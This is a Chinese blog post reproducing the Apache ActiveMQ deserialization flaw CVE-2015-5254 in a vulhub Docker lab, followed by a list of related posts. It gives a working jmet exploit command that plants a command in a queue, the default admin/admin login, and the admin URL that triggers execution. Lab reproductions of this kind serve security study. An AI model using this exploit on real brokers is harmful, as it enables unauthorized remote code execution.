vulhub中activemq的CVE-2015-5254漏洞复现

已于 2024-02-02 14:38:26 修改
阅读量522 收藏 9
点赞数 11
分类专栏: vulhub漏洞复现 文章标签: activemq 安全
于 2023-11-24 22:22:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/134607765
版权

漏洞描述

  1. 漏洞编号:CVE-2015-5254
  2. 影响版本:Apache ActiveMQ 5.13.0之前5.x版本,https://www.cvedetails.com/cve/CVE-2015-5254/
  3. 漏洞产生原因:该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

复现过程

1.启动漏洞docker环境后,看到下面这个页面

2.可以通过输入/amdin弹出登录弹框输入admin admin登录就可以看到版本号

3.使用[jmet]()进行漏洞利用。下载jmet的jar文件,执行下面命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.188.128 61616

4.执行成功之后,此时会给目标ActiveMQ添加一个名为event的队列,可以通过这个地址看到队列中的消息  http://192.168.188.128:8161/admin/browse.jsp?JMSDestination=event   

5.点击这条消息,命令被执行 ,此时进入容器`docker-compose exec activemq bash`,可见/tmp/success已成功创建,说明漏洞利用成功

我是参考这个师傅的博客复现的CVE-2015-5254(ActiveMQ反序列化漏洞) - toby123 - 博客园 (cnblogs.com)

余生有个小酒馆
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 611
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息间件。ActiveMQ是消息队列服务,是面向消息间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
[ vulhub漏洞复现篇 ] ActiveMQ反序列化漏洞复现CVE-2015-5254
qq_51577576的博客
08-14 2984
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。Apache ActiveMQ 5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。......
利用Vulnhub复现漏洞 - ActiveMQ 反序列化漏洞CVE-2015-5254
JiangBuLiu的博客
06-27 1016
ActiveMQ 反序列化漏洞CVE-2015-5254Vulnhub官方复现教程漏洞原理复现漏洞启动环境TerminalFirefox Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md 漏洞原理 https://www.jianshu.com/p/...
01 - vulhub - ActiveMq - CVE-2015-5254
易编橙 · 终身成长社群,相遇已是上上签!
09-18 632
漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
vulhub-activemq-CVE-2015-5254
weixin_43585088的博客
04-17 527
vulhub-activemq-CVE-2015-5254 ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息间件 默认端口:8161 vulhub起容器 搭建的时候出了点问题,查了一下可能是net模式的dns有问题,sudo vim /etc/resolv.conf 去添加一些nameserver ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.i
ActiveMQ反序列化漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 429
ActiveMQ反序列化漏洞CVE-2015-5254复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
FryhRx的博客
03-29 4496
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 2900
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。远程攻击者...
vulhub学习(1) ActiveMQ反序列化漏洞CVE-2015-5254复现
yukinorong的博客
06-24 1377
漏洞环境 配置vulhub , 在目录activemq/CVE-2015-5254打开docker。 docker显示 此时开启了两个端口分别为8161和61616 其61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞复现 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消
vulhub-activemq-CVE-2016-3088复现
qq_42728977的博客
12-08 648
这里写目录标题漏洞编号:CVE-2016-3088影响版本:Apache ActiveMQ 5.x~5.14.0漏洞产生原因:复现 :思考:参考 漏洞编号:CVE-2016-3088 影响版本:Apache ActiveMQ 5.x~5.14.0 https://www.cvedetails.com/cve/CVE-2016-3088/ 漏洞产生原因: ActiveMQ的web控制台分三个应用,admin、api和fileserver,其admin是管理员页面,api是接口,fileserver是储存文件
vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 1952
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
vulhub-activemq-cve-2015-5254
Ronin_qianmo的博客
07-27 166
1、漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-2017-7504出现在/j
vulhub漏洞复现ActiveMQ(CVE-2015-5254CVE-2016-3088)
weixin_43071873的博客
11-25 292
记录这次一点都不顺利的漏洞复现,两个漏洞都没能反弹shell,getshell,记录复现过程,或许对各位有一丢丢得作用,过程可能比较粗糙,还请各位见谅 ActiveMQ 反序列化漏洞CVE-2015-5254漏洞简介: Apache ActiveMQ 5.13.0之前5.x版本存在安全漏洞,该漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 影响版本: Apache ActiveMQ 5.13.0
ActiveMQ--CVE-2015-5254
weixin_37639863的博客
02-17 928
ActiveMQ反序列化漏洞CVE-2015-5254复现 - 渗透测试心 - 博客园0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务,集群,Spring Framework等。Apache Ahttps://www.cnblogs.com/backlion/p/9970516.htmlActiveMQ 反序列化漏洞复现CVE-2015-5254)_浮生一世暖流年的博客-CSDN博客环境搭建使用vulhub
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
最新发布
m0_74402888的博客
04-30 1325
1.在IDEA建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。其61616端口是工作端口,消息在这个端口上传递;
vulhub漏洞复现ActiveMQ 反序列化漏洞 (CVE-2015-5254)-01
书山上的云的博客
01-10 3010
一、漏洞描述 Apache ActiveMQ 是由美国阿帕奇(Apache)软件基金会开发的开源消息间件,支持 Java 消息服务、集群、Spring 框架等。属于消息队列组件(消息队列组件:分布式系统的重要组件,主要解决应用耦合、异步消息、流量削峰等)。 二、漏洞成因 Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理可以序列化的类。远程攻击者可以制作一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象,利用该漏洞执行
ActiveMQ反序列化漏洞CVE-2015-5254
chaojixiaojingang
01-22 486
1.漏洞描述 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2.影响版本 Apache ActiveMQ 5.13.0之前5.x版本 3.漏洞环境搭建 靶机:安装daocker环境centos7: 192.168....
activemq哪个版本能解决CVE-2022-2048的漏洞
06-09
CVE-2022-2048是Apache ActiveMQ的一个重要漏洞,可能允许攻击者通过发送恶意JMS消息来执行任意代码。该漏洞影响多个ActiveMQ版本,包括5.0.0到5.15.15、5.16.0到5.16.3和5.17.0到5.17.2。 为了解决这个漏洞,Apache ActiveMQ社区发布了修复补丁,并推荐用户升级到以下版本: - ActiveMQ 5.15.16 - ActiveMQ 5.16.4 - ActiveMQ 5.17.3 如果您正在使用受影响的版本,请尽快升级到上述版本或应用官方提供的修复补丁。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值